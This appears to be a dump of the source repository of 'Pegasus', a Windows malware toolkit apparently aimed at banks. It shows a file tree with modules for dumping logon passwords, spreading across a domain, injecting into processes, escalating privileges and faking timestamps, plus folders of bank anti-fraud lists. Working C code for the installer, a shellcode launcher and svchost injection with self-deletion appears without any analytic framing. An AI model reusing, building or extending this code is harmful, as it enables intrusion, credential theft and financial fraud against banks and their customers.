├── Pegasus ├── InstallDispatcherDll │ ├── Install_Injection.cpp │ ├── Install_Injection.h │ ├── PrivEsc.cpp │ ├── PrivEsc.h │ ├── idd.c │ ├── idd.h │ ├── idd.vcxproj │ ├── idd.vcxproj.filters │ └── privesc_2015__0057_1701.h ├── InstallerExe │ ├── inst.c │ ├── inst.h │ ├── inst.vcproj │ ├── inst.vcxproj │ ├── inst.vcxproj.filters │ ├── inst.vcxproj.user │ └── resource.h ├── LZ4_pack │ ├── LZ4_pack.vcproj │ ├── LZ4_pack.vcxproj │ ├── LZ4_pack.vcxproj.filters │ ├── LZ4_pack.vcxproj.user │ ├── lib │ │ ├── amd64 │ │ │ ├── BufferOverflowU.lib │ │ │ └── ntdll.lib │ │ └── i386 │ │ │ ├── BufferOverflowU.lib │ │ │ └── ntdll.lib │ ├── main.c │ └── main.h ├── Pegasus.opensdf ├── Pegasus.sdf ├── Pegasus.sln ├── Pegasus.v12.suo ├── README.TXT ├── RemoteServiceExe │ ├── rse.c │ ├── rse.h │ ├── rse.vcxproj │ ├── rse.vcxproj.filters │ └── rse.vcxproj.user ├── Shellcode │ ├── Shellcode.vcproj │ ├── Shellcode.vcxproj │ ├── Shellcode.vcxproj.filters │ ├── Shellcode.vcxproj.user │ ├── dbgt.h │ ├── dbgt.h__ │ ├── shellcode.c │ └── shellcode.h ├── WEB │ ├── .htaccess │ ├── Properties │ │ └── PublishProfiles │ │ │ ├── denwer.phppub │ │ │ └── denwer.phppub.user │ ├── cfg │ │ ├── .htaccess │ │ └── config.php │ ├── inc │ │ ├── .htaccess │ │ ├── mod_crypt.php │ │ ├── mod_db.php │ │ ├── mod_log.php │ │ ├── mod_output.php │ │ ├── mod_parser.php │ │ ├── parser_0001.php │ │ ├── parser_0002.php │ │ ├── parser_0003.php │ │ ├── parser_0004.php │ │ ├── parser_0005.php │ │ ├── parser_0006.php │ │ └── parser_0007.php │ ├── index.php │ ├── pegasus-web.phpproj │ └── pegasus-web.phpproj.user ├── WorkDispatcherDll │ ├── wdd.c │ ├── wdd.h │ ├── wdd.vcxproj │ ├── wdd.vcxproj.filters │ └── wdd.vcxproj.user ├── binres │ ├── idd.x32 │ ├── idd.x64 │ ├── info.json │ │ ├── idd │ │ ├── mod_CmdExec │ │ ├── mod_DomainReplication │ │ ├── mod_KBRI │ │ ├── mod_KBRI_hd │ │ ├── mod_LogonPasswords │ │ ├── mod_NetworkConnectivity │ │ ├── rse │ │ ├── shellcode │ │ └── wdd │ ├── mod_CmdExec.x32 │ ├── mod_CmdExec.x64 │ ├── mod_DomainReplication.x32 │ ├── mod_DomainReplication.x64 │ ├── mod_LogonPasswords.x32 │ ├── mod_LogonPasswords.x64 │ ├── mod_NetworkConnectivity.x32 │ ├── mod_NetworkConnectivity.x64 │ ├── readme.txt │ ├── rse.x32 │ ├── rse.x32.nosign.sav │ ├── rse.x32.sign.sav │ ├── rse.x64 │ ├── rse.x64.nosign.sav │ ├── rse.x64.sign.sav │ ├── shellcode.x32 │ ├── shellcode.x64.tlog │ ├── wdd.x32 │ └── wdd.x64 ├── inc │ ├── CredManager.cpp │ ├── CredManager.h │ ├── CryptRoutines.cpp │ ├── CryptRoutines.h │ ├── CryptoStrings.c │ ├── CryptoStrings.h │ ├── DataCallbackManager.cpp │ ├── DataCallbackManager.h │ ├── DomainListMachines.cpp │ ├── DomainListMachines.h │ ├── DynImports.c │ ├── DynImports.h │ ├── EmbeddedResources.cpp │ ├── EmbeddedResources.h │ ├── HashDeriveFuncs.cpp │ ├── HashDeriveFuncs.h │ ├── HashedStrings.c │ ├── HashedStrings.h │ ├── LZ4 │ │ ├── bench.c │ │ ├── bench.h │ │ ├── lz4.c │ │ ├── lz4.h │ │ ├── lz4_format_description.txt │ │ └── lz4demo.c │ ├── LocalStorage.cpp │ ├── LocalStorage.h │ ├── MailslotWorks.cpp │ ├── MailslotWorks.h │ ├── MyStreams.c │ ├── MyStreams.h │ ├── MyStringRoutines.c │ ├── MyStringRoutines.h │ ├── NetMessageEnvelope.cpp │ ├── NetMessageEnvelope.h │ ├── PELoader.cpp │ ├── PELoader.h │ ├── PipeWorks.cpp │ ├── PipeWorks.h │ ├── ProcessInjectMP.cpp │ ├── ProcessInjectMP.h │ ├── RandomGen.c │ ├── RandomGen.h │ ├── RegFuncs.cpp │ ├── RegFuncs.h │ ├── SecureClean.cpp │ ├── SecureClean.h │ ├── WOW64Detect.cpp │ ├── WOW64Detect.h │ ├── WorkDispatcher.cpp │ ├── WorkDispatcher.h │ ├── Wow64Jump.cpp │ ├── Wow64Jump.h │ ├── binpack.h │ ├── dbg.c │ ├── dbg.h │ ├── machineid.cpp │ ├── machineid.h │ ├── mem.c │ └── mem.h ├── lib │ ├── amd64 │ │ ├── BufferOverflowU.lib │ │ └── ntdll.lib │ └── i386 │ │ ├── BufferOverflowU.lib │ │ └── ntdll.lib ├── mod_CmdExec │ ├── ceDiskExec.cpp │ ├── ceDiskExec.h │ ├── ceDllMemory.cpp │ ├── ceDllMemory.h │ ├── ceGeneric.cpp │ ├── ceGeneric.h │ ├── ceShellScript.cpp │ ├── ceShellScript.h │ ├── mod_CmdExec.c │ ├── mod_CmdExec.filters │ ├── mod_CmdExec.h │ ├── mod_CmdExec.vcxproj │ └── mod_CmdExec.vcxproj.filters ├── mod_DomainReplication │ ├── DomainReplication.cpp │ ├── DomainReplication.h │ ├── RDP.cpp │ ├── RDP.h │ ├── SCM.cpp │ ├── SCM.h │ ├── WMI.c │ ├── WMI.h │ ├── mod_DomainReplication.c │ ├── mod_DomainReplication.filters │ ├── mod_DomainReplication.h │ ├── mod_DomainReplication.vcxproj │ └── mod_DomainReplication.vcxproj.filters ├── mod_KBRI │ ├── KBRI.cpp │ ├── KBRI.h │ ├── kbriController.cpp │ ├── kbriController.h │ ├── kbriDataParser.cpp │ ├── kbriDataParser.h │ ├── kbriGeneratePurpose.cpp │ ├── kbriGeneratePurpose.h │ ├── kbriInject.cpp │ ├── kbriInject.h │ ├── kbriList.cpp │ ├── kbriList.h │ ├── kbriTargetAccManager.cpp │ ├── kbriTargetAccManager.h │ ├── mod_KBRI.c │ ├── mod_KBRI.filters │ ├── mod_KBRI.h │ ├── mod_KBRI.vcxproj │ └── mod_KBRI.vcxproj.filters ├── mod_KBRI_hd │ ├── APIHook.c │ ├── APIHook.h │ ├── KBRI_hd.cpp │ ├── KBRI_hd.h │ ├── khdProcessing.cpp │ ├── khdProcessing.h │ ├── ldasm.cpp │ ├── ldasm.h │ ├── mod_KBRI_hd.c │ ├── mod_KBRI_hd.filters │ ├── mod_KBRI_hd.h │ ├── mod_KBRI_hd.vcxproj │ └── mod_KBRI_hd.vcxproj.filters ├── mod_LogonPasswords │ ├── LogonPasswords.cpp │ ├── LogonPasswords.h │ ├── globdefs.h │ ├── lpmemory.cpp │ ├── lpmemory.h │ ├── lpprocess.cpp │ ├── lpprocess.h │ ├── mod_LogonPasswords.c │ ├── mod_LogonPasswords.filters │ ├── mod_LogonPasswords.h │ ├── mod_LogonPasswords.vcxproj │ ├── mod_LogonPasswords.vcxproj.filters │ ├── mod_ntddk.h │ ├── sec_pkg │ │ ├── kerberos.cpp │ │ ├── kerberos.h │ │ ├── livessp.cpp │ │ ├── livessp.h │ │ ├── msv1_0.cpp │ │ ├── msv1_0.h │ │ ├── ssp.cpp │ │ ├── ssp.h │ │ ├── tspkg.cpp │ │ ├── tspkg.h │ │ ├── wdigest.cpp │ │ └── wdigest.h │ └── secpkg.h ├── mod_NetworkConnectivity │ ├── NetworkConnectivity.cpp │ ├── NetworkConnectivity.h │ ├── mod_NetworkConnectivity.c │ ├── mod_NetworkConnectivity.filters │ ├── mod_NetworkConnectivity.h │ ├── mod_NetworkConnectivity.vcxproj │ ├── mod_NetworkConnectivity.vcxproj.filters │ ├── transport_Generic.cpp │ ├── transport_Generic.h │ ├── transport_Pipes.cpp │ ├── transport_Pipes.h │ ├── transport_WinHTTP.cpp │ └── transport_WinHTTP.h ├── shared │ ├── CommStructures.cpp │ ├── CommStructures.h │ ├── ModuleAPI.h │ ├── ModuleDescriptor.h │ └── config.h ├── tools │ ├── LZ4_pack.exe │ ├── MAKE_INSTALLERS.BAT │ ├── __file2bin.php │ ├── __shellcode2bin.php │ ├── core_build.log │ ├── fake_timestamps.php │ ├── make_binpack.php │ ├── mods_build.log │ ├── postbuild_installer.bat │ ├── prebuild_installer.bat │ ├── rebuild_core.bat │ ├── rebuild_modules.bat │ ├── rebuild_project.bat │ ├── recrypt_strings.bat │ ├── recrypt_strings.php │ └── signtool.exe └── web-adminpart │ ├── .htaccess │ ├── cfg │ ├── .htaccess │ └── config.php │ ├── db.sql │ ├── inc │ ├── .htaccess │ ├── inc_ajax.php │ ├── ip2location.class.php │ ├── mod_ajax_mcreds.php │ ├── mod_ajax_misc.php │ ├── mod_ajax_mjobs.php │ ├── mod_ajax_mmachines.php │ ├── mod_ajax_msqlog.php │ ├── mod_ajax_mtaccs.php │ ├── mod_auth.php │ ├── mod_db.php │ ├── mod_petools.php │ └── mod_router.php │ ├── index.php │ └── res │ ├── .htaccess │ ├── bootstrap.min.css │ ├── bootstrap.min.js │ ├── glyphicons-halflings-regular.eot │ ├── glyphicons-halflings-regular.svg │ ├── glyphicons-halflings-regular.ttf │ ├── index.html │ ├── jquery-1.11.2.min.js │ ├── jquery-ui.min.css │ ├── jquery-ui.min.js │ ├── jquery.form.min.js │ ├── jquery.jeditable.js │ ├── main.js │ ├── messi.min.css │ ├── messi.min.js │ ├── my.css │ ├── pnotify.custom.min.css │ ├── pnotify.custom.min.js │ ├── ui-bg_diagonals-thick_18_b81900_40x40.png │ ├── ui-bg_diagonals-thick_20_666666_40x40.png │ ├── ui-bg_flat_10_000000_40x100.png │ ├── ui-bg_glass_100_f6f6f6_1x400.png │ ├── ui-bg_glass_100_fdf5ce_1x400.png │ ├── ui-bg_glass_65_ffffff_1x400.png │ ├── ui-bg_gloss-wave_35_f6a828_500x100.png │ ├── ui-bg_highlight-soft_100_eeeeee_1x100.png │ ├── ui-bg_highlight-soft_75_ffe45c_1x100.png │ ├── ui-icons_222222_256x240.png │ ├── ui-icons_228ef1_256x240.png │ ├── ui-icons_ef8c08_256x240.png │ ├── ui-icons_ffd27a_256x240.png │ └── ui-icons_ffffff_256x240.png ├── bck_check └── check.php ├── cvs_banks ├── asv.csv ├── base.txt ├── fraud_basics.txt ├── one.txt ├── plb.csv ├── АНТИФРАУД.txt ├── Антидропы (485) 24 08 2015.xls ├── Антидропы (500) 30 06 2015.xls ├── Нипбанк.csv ├── СБ Липецк на 17.11.2015.doc ├── Список СБ банков г. Воронежа на 13.02.2013 (со списком рассылки).doc ├── акбарс.csv ├── акрополь.csv ├── генбанк.csv ├── икбанк.csv ├── интерпромбанк.csv ├── металинвестбанк.csv ├── минбанк.csv ├── невский.csv └── рсхб.csv ├── gen_payments_script └── gen1.php ├── info.txt └── readme.txt /Pegasus/InstallDispatcherDll/Install_Injection.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Install_Injection.cpp 3 | Injection method installation 4 | NB: this module uses passed SHELLCODE_CONTEXT structure to prepare new binbuffer (or copy it) 5 | to another injecting process. Due to relative ptrs in context, it could be copied directly 6 | The only change should be done here is modification of execution target from IDD (install dll) to WDD (work dll) 7 | Alternativly, IDD may be wiped entierly 8 | */ 9 | 10 | #include 11 | 12 | #include "..\inc\mem.h" 13 | #include "..\inc\dbg.h" 14 | #include "..\inc\ProcessInjectMP.h" 15 | #include "..\Shellcode\shellcode.h" 16 | #include "..\shared\ModuleDescriptor.h" 17 | 18 | #include "Install_Injection.h" 19 | 20 | 21 | 22 | /* 23 | Attempts to perform injection of data passed by shellcode's context 24 | into another process, like svchost.exe 25 | pSContext points to start of buffer 26 | 27 | */ 28 | BOOL instInjection(SHELLCODE_CONTEXT *pSContext) 29 | { 30 | BOOL bRes = FALSE; // function result 31 | 32 | INJECT_CONTEXT ic = { 0 }; // params for AttemptSvchostInjection() call 33 | SHELLCODE_CONTEXT *sc_copy = NULL; // ptr to a copy of original shellcode context structure, to modify ptrs to dll exec target 34 | 35 | DbgPrint("entered"); 36 | 37 | // prepare a copy of full chunk started at pShellcodePtr 38 | ic.lInjectionChunkLen = pSContext->dwFullChunkLen; 39 | ic.pInjectionChunk = my_alloc(pSContext->dwFullChunkLen); 40 | 41 | if (!ic.pInjectionChunk) { DbgPrint("ERR: failed to alloc %u bytes to copy starter binpack", pSContext->dwFullChunkLen); return bRes; } 42 | 43 | // copy chunk 44 | memcpy(ic.pInjectionChunk, pSContext, ic.lInjectionChunkLen); 45 | 46 | // fill params for injection 47 | // NB: ic assumes offsets from the START of the chunk, not the shellcode itself, so modify ptrs correctly 48 | ic.lShellcodeEntryOffset = pSContext->dwShellcodeEntrypointOffset + pSContext->dwStructureLen; 49 | 50 | // get ptr to a shellcode context structure in a new buffer 51 | sc_copy = (SHELLCODE_CONTEXT *)(ic.pInjectionChunk); 52 | 53 | // change execution target in new shellcode context to point to WDD instead of IDD originally 54 | sc_copy->prelExecDll = sc_copy->prelWDD; 55 | sc_copy->dwExecDllLen = sc_copy->dwWDDLen; 56 | 57 | // also set no-return flag in new copy of structure 58 | sc_copy->bNoReturnFromShellcode = TRUE; 59 | 60 | // query host exe to be removed by WDD at injected process 61 | GetModuleFileNameW(NULL, (LPWSTR)&sc_copy->bRemoveFilePath[0], MAX_PATH); 62 | 63 | // call it 64 | bRes = AttemptSvchostInjection(&ic); 65 | DbgPrint("injection api returned %u", bRes); 66 | 67 | // do cleanup 68 | my_free(ic.pInjectionChunk); 69 | 70 | return bRes; 71 | } -------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/Install_Injection.h: -------------------------------------------------------------------------------- 1 | /* 2 | Install_Injection.h 3 | */ 4 | 5 | #include 6 | 7 | #include "..\Shellcode\shellcode.h" 8 | 9 | BOOL instInjection(SHELLCODE_CONTEXT *pSContext); -------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/PrivEsc.h: -------------------------------------------------------------------------------- 1 | /* 2 | PrivEsc.h 3 | */ 4 | 5 | #include 6 | 7 | typedef BOOL(NTAPI *SHELL_ENTRY_PROC)(ULONG ulTargetPID); 8 | 9 | // structure to pass params and received result from runner thread 10 | typedef struct _PE_THREAD_PARAMS 11 | { 12 | SHELL_ENTRY_PROC sepExploitExec; // ptr to exploit entry function 13 | 14 | BOOL bExecResult; // exec result, returned by exploit 15 | 16 | } PE_THREAD_PARAMS, *PPE_THREAD_PARAMS; 17 | 18 | 19 | VOID privescDo(); -------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/idd.c: -------------------------------------------------------------------------------- 1 | /* 2 | idd.c 3 | Install Dispatcher DLL 4 | Executed via shellcode inside of on-disk file, placed by remote machine when domain replication process is in progress 5 | Selects install method to place all the extra data specified by SHELLCODE_CONTEXT structure 6 | 7 | */ 8 | 9 | 10 | // perform essential compiler settings 11 | // remove stdlib 12 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 15 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 16 | 17 | 18 | #include 19 | 20 | 21 | 22 | #include "..\inc\mem.h" 23 | #include "..\inc\dbg.h" 24 | //#include "..\inc\CryptoStrings.h" 25 | 26 | 27 | #include "..\shared\config.h" 28 | 29 | #ifdef DO_PRIVILEGE_ESCALATION 30 | #include "PrivEsc.h" 31 | #endif 32 | 33 | #include "Install_Injection.h" 34 | 35 | 36 | #if defined(_M_X64) 37 | // x64 system libs 38 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 39 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 40 | #elif defined(_M_IX86) 41 | // x32 system libs 42 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 43 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 44 | #else 45 | #error Unknown target CPU, no system libs can be found 46 | #endif 47 | 48 | 49 | 50 | #include "idd.h" 51 | 52 | 53 | 54 | // entrypoint function for service exe 55 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 56 | { 57 | BOOL bRes = TRUE; 58 | 59 | if (fdwReason == DLL_PROCESS_ATTACH) { 60 | 61 | DbgPrint("DLL_PROCESS_ATTACH: entered"); 62 | 63 | do { // not a loop 64 | 65 | 66 | 67 | #ifdef DO_PRIVILEGE_ESCALATION 68 | privescDo(); 69 | #endif 70 | 71 | // do init and return right back 72 | if (instInjection((SHELLCODE_CONTEXT *)lpvReserved)) { break; } 73 | 74 | // other methods... 75 | // ... 76 | 77 | // if got here -> installation failed 78 | DbgPrint("installation failed"); 79 | 80 | } while (FALSE); // not a loop 81 | 82 | DbgPrint("DLL_PROCESS_ATTACH: done"); 83 | 84 | ExitProcess(0); 85 | 86 | } // DLL_PROCESS_ATTACH 87 | 88 | return bRes; 89 | } 90 | 91 | 92 | 93 | 94 | 95 | 96 | -------------------------------------------------------------------------------- /Pegasus/InstallDispatcherDll/idd.h: -------------------------------------------------------------------------------- 1 | /* 2 | idd.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.c: -------------------------------------------------------------------------------- 1 | // main.cpp : Defines the entry point for the application. 2 | 3 | 4 | // perform essential compiler settings 5 | // remove stdlib 6 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 7 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 8 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 9 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 10 | 11 | 12 | #include 13 | 14 | // for dbg GetComputerObjectName() test 15 | /* 16 | #define SECURITY_WIN32 17 | #include 18 | #pragma comment (lib, "secur32.lib") 19 | */ 20 | 21 | #include "..\inc\mem.h" 22 | #include "..\inc\dbg.h" 23 | #include "..\inc\CryptoStrings.h" 24 | #include "..\inc\EmbeddedResources.h" 25 | #include "..\Shellcode\shellcode.h" 26 | 27 | 28 | #if defined(_M_X64) 29 | // x64 system libs 30 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 31 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 32 | #define TARGET_ARCH ARCH_TYPE_X64 33 | #elif defined(_M_IX86) 34 | // x32 system libs 35 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 36 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 37 | #define TARGET_ARCH ARCH_TYPE_X32 38 | #else 39 | #error Unknown target CPU, no system libs can be found 40 | #endif 41 | 42 | // binary resources to be registered, all items in serialized structure to be passed 43 | // ending items contains { 0 } strucutre to stop enum just after it 44 | #include "..\inc\binpack.h" 45 | 46 | 47 | 48 | #include "inst.h" 49 | 50 | // dbg to show GUID for compname 51 | // NB: looks like guid is assigned only when machine joins a domain 52 | /* 53 | VOID _objname() 54 | { 55 | LPWSTR wszName; // buffer to hold guid string 56 | ULONG ulSize = 256; 57 | 58 | wszName = (LPWSTR)my_alloc(1024); 59 | 60 | GetComputerObjectName(NameUniqueId, wszName, &ulSize); 61 | DbgPrint("compname guid=[%ws]", wszName); 62 | 63 | my_free(wszName); 64 | 65 | }*/ 66 | 67 | /* 68 | LONG CALLBACK VectoredHandler(PEXCEPTION_POINTERS ExceptionInfo) 69 | { 70 | DbgPrint("handler entered"); 71 | 72 | ExitThread(255); 73 | 74 | return 0; 75 | } 76 | */ 77 | 78 | // entrypoint function for installer exe file 79 | void __cdecl main() 80 | { 81 | // buffer to hold exec chunk 82 | LPVOID pExecBuffer = NULL; 83 | DWORD dwExecBufferLen = 0; 84 | 85 | ShellcodeEntryPoint shEntry; // ptr to entrypoint for shellcode at pExecBuffer 86 | LPVOID pContextPtr = NULL; // ptr at pExecBuffer to SHELLCODE_CONTEXT structure 87 | 88 | //HANDLE pHandler = NULL; 89 | 90 | DbgPrint("entered, registering modules"); 91 | 92 | // enum and register all embedded modules 93 | erRegisterModules(&pbinpack); 94 | 95 | // generate binpack 96 | DbgPrint("generating binpack for execution"); 97 | if (erGetStarterBinpack(TARGET_ARCH, &pExecBuffer, &dwExecBufferLen, &pContextPtr, (LPVOID *)&shEntry)) { 98 | 99 | //if (!(pHandler = AddVectoredExceptionHandler(0, &VectoredHandler))) { DbgPrint("ERR: failed to add vectored handler"); } 100 | 101 | // do exec 102 | DbgPrint("executing from %p passing param %p, pExecBuffer=%p dwExecBufferLen=%u", shEntry, pContextPtr, pExecBuffer, dwExecBufferLen); 103 | shEntry(pContextPtr); 104 | DbgPrint("all done"); 105 | 106 | } else { DbgPrint("ERR: failed to generate exec buffer"); } 107 | 108 | Sleep(5000); 109 | 110 | // is this needed? 111 | ExitProcess(0); 112 | } 113 | 114 | 115 | 116 | 117 | 118 | 119 | -------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.h: -------------------------------------------------------------------------------- 1 | /* 2 | inst.h 3 | Headers for main file 4 | */ 5 | 6 | #pragma once 7 | 8 | #include 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /Pegasus/InstallerExe/inst.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(OutDir)$(ProjectName)32.exe 5 | WindowsLocalDebugger 6 | 7 | 8 | $(OutDir)$(ProjectName)64.exe 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /Pegasus/InstallerExe/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by inst.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1000 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/LZ4_pack.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {40e48244-e3b1-455a-9190-5ad5e9b92084} 10 | 11 | 12 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 13 | h;hpp;hxx;hm;inl;inc;xsd 14 | 15 | 16 | {b3e299b9-8f41-45b2-a206-a8b9322b0b63} 17 | 18 | 19 | 20 | 21 | Source Files 22 | 23 | 24 | Source Files\libs 25 | 26 | 27 | Source Files\libs 28 | 29 | 30 | Source Files\libs 31 | 32 | 33 | Source Files\libs 34 | 35 | 36 | Source Files\libs 37 | 38 | 39 | 40 | 41 | Header Files 42 | 43 | 44 | Header Files\libs 45 | 46 | 47 | Header Files\libs 48 | 49 | 50 | Header Files\libs 51 | 52 | 53 | Header Files\libs 54 | 55 | 56 | Header Files\libs 57 | 58 | 59 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/LZ4_pack.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/amd64/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/amd64/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/amd64/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/amd64/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/i386/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/i386/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/lib/i386/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/LZ4_pack/lib/i386/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/LZ4_pack/main.h: -------------------------------------------------------------------------------- 1 | /* 2 | main.h 3 | StarterExe headers for main file 4 | */ 5 | 6 | #pragma once 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Pegasus/Pegasus.opensdf: -------------------------------------------------------------------------------- 1 | userIBUILD2 -------------------------------------------------------------------------------- /Pegasus/Pegasus.sdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/Pegasus.sdf -------------------------------------------------------------------------------- /Pegasus/Pegasus.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/Pegasus.v12.suo -------------------------------------------------------------------------------- /Pegasus/README.TXT: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/README.TXT -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.h: -------------------------------------------------------------------------------- 1 | /* 2 | inst.h 3 | Headers for main file 4 | */ 5 | 6 | #pragma once 7 | 8 | #include 9 | 10 | // prototype of shellcode's entrypoint - it receives ptr where in mem it is placed 11 | typedef void (_stdcall *ShellcodeEntrypoint)(LPVOID); 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {a98e1532-1a9f-454d-bb98-b142237a22d1} 10 | 11 | 12 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 13 | h;hpp;hxx;hm;inl;inc;xsd 14 | 15 | 16 | {884d1b19-d44f-43be-a1e2-10637acc7096} 17 | 18 | 19 | {e28722b0-6050-4e42-bc1d-4cda2352a585} 20 | 21 | 22 | {454cfc1d-f375-4743-b318-2f8a82a1f686} 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files\libs 31 | 32 | 33 | Source Files\libs 34 | 35 | 36 | Source Files\libs 37 | 38 | 39 | Source Files\libs 40 | 41 | 42 | Source Files\libs 43 | 44 | 45 | Source Files\libs 46 | 47 | 48 | Source Files\incs 49 | 50 | 51 | Source Files\incs 52 | 53 | 54 | Source Files\libs 55 | 56 | 57 | 58 | 59 | Header Files 60 | 61 | 62 | Header Files\libs 63 | 64 | 65 | Header Files\libs 66 | 67 | 68 | Header Files\libs 69 | 70 | 71 | Header Files\libs 72 | 73 | 74 | Header Files\libs 75 | 76 | 77 | Header Files 78 | 79 | 80 | Header Files\libs 81 | 82 | 83 | Header Files\incs 84 | 85 | 86 | Header Files\libs 87 | 88 | 89 | Header Files\libs 90 | 91 | 92 | -------------------------------------------------------------------------------- /Pegasus/RemoteServiceExe/rse.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /Pegasus/Shellcode/Shellcode.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {720fbc28-553d-47a8-9b47-e14475397dd8} 14 | 15 | 16 | {1c471d13-0137-494f-9cd9-4497cc87d11e} 17 | 18 | 19 | 20 | 21 | Source Files\libs 22 | 23 | 24 | Source Files\libs 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | Header Files\libs 33 | 34 | 35 | Header Files\libs 36 | 37 | 38 | Header Files 39 | 40 | 41 | -------------------------------------------------------------------------------- /Pegasus/Shellcode/Shellcode.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Pegasus/WEB/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteOptions inherit 3 | RewriteRule ^(.*)$ index.php [L] -------------------------------------------------------------------------------- /Pegasus/WEB/Properties/PublishProfiles/denwer.phppub: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | True 6 | \\denwer\pegasus 7 | FileSystem 8 | 9 | -------------------------------------------------------------------------------- /Pegasus/WEB/Properties/PublishProfiles/denwer.phppub.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 04/16/2015 05:51:36 6 | 7 | 8 | 03/27/2012 20:14:14 9 | 10 | 11 | 05/19/2015 07:21:13 12 | 13 | 14 | 03/27/2012 20:14:14 15 | 16 | 17 | 05/19/2015 11:48:18 18 | 19 | 20 | 04/23/2015 